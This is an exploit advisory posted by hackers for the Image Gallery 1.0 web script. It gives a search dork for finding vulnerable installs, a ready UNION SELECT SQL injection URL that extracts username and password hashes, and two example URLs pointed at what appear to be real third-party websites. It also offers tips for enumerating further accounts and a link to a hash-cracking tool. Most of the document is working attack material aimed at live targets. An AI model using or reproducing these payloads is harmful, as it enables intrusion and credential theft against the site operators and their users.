1 −−==+================================================================================+==−−
2 −−==+ Image Gallery 1.0 SQL Injection Vulnerbilitys +==−−
3 −−==+================================================================================+==−−
4
5
6
7 AUTHOR: t0pP8uZz & xprog
8
9
10 SCRIPT DOWNLOAD: N/A
11
12
13 SITE: http://www.elkagroup.com/
14
15
16 DORK: intext:elkagroup Image Gallery v1.0
17
18 DESCRIPTION: With this vuln you can display every user:hash in the database
19
20 EXPLOITS:
21
22 EXPLOIT 1: http://www.server.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=−1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,c
oncat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
23
24
25
26 EXAMPLES:
27
28 EXAMPLE 1: http://www.abfa−esfahan.com/gallery/property.php?cid=9&uid=0&pid=−1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7
,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
29
30 EXAMPLE 2 (getting diffrent user): http://www.qanat.info/en/gallery/property.php?cid=0&uid=0&pid=−1%20UNION%20ALL%20S
ELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16%20from%20users%20%20where%20username%
20not%20in%20(0x71616E6174696E)
31
32 NOTE/TIP: hex the first username you get with EXAMPLE 1 then use EXAMPLE 2 and replace the hex with your new hex, To
get diffrent users.
33 Also sometimes te columns may vary so if its not working correct, add a few columns and remove a few, Enjoy.
34
35 NOTE/TIP: The md5 has 13 characters removed from the end.
36
37 Cracking Hashes: the hash this script uses is a modifed MD5 i have coded a tool for any type of md5 hash it works ver
y well and is extremely fast while
38 leaveing your cpu untouched, download it here: http://www.h4cky0u−filez.org/5819352
39
40 GREETZ: str0ke, H4CKY0u.org, G0t−Root.net !
41
42
43 −−==+================================================================================+==−−
44 −−==+ Image Gallery 1.0 SQL Injection Vulnerbilitys +==−−
45 −−==+===============